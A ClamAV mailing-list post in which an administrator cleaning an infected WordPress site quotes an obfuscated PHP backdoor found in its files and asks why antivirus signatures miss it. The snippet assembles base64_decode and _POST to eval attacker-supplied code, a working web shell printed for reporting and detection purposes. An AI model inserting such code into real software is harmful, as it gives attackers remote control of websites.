Hi folks,
I'm in the process of cleaning up an infected wordpress website and am
finding a number of files that contain
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if
(isset(${$s20}['na04af1'])) {eval($s21(${$s20}['na04af1']));}?>
Inserted at the top of the file.
Surely this is something pretty simple to catch?
I'/m scanning the docroot nightly, and freshclam is up to date... output
from just run freshclam:
# freshclam
ClamAV update process started at Wed Mar 25 08:38:55 2015
main.cvd is up to date (version: 55, sigs: 2424225, f-level: 60,
builder: neo)
Downloading daily-20233.cdiff [100%]
Downloading daily-20234.cdiff [100%]
daily.cld updated (version: 20234, sigs: 1357485, f-level: 63, builder:
jesler)
bytecode.cld is up to date (version: 247, sigs: 41, f-level: 63,
builder: dgoddard)
Database updated (3781751 signatures) from db.au.clamav.net (IP:
117.104.160.194)
I'm finding them by searching for the string "PCT4BA6ODSE"
Shouldn't this be in there already? If there is a process to add this
can someone please point me to the docs?
Thanks,
Steve
--
Steve Holdoway BSc(Hons) MIITP
http://www.greengecko.co.nz
Linkedin: http://www.linkedin.com/in/steveholdoway
Skype: sholdowa
_______________________________________________
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml
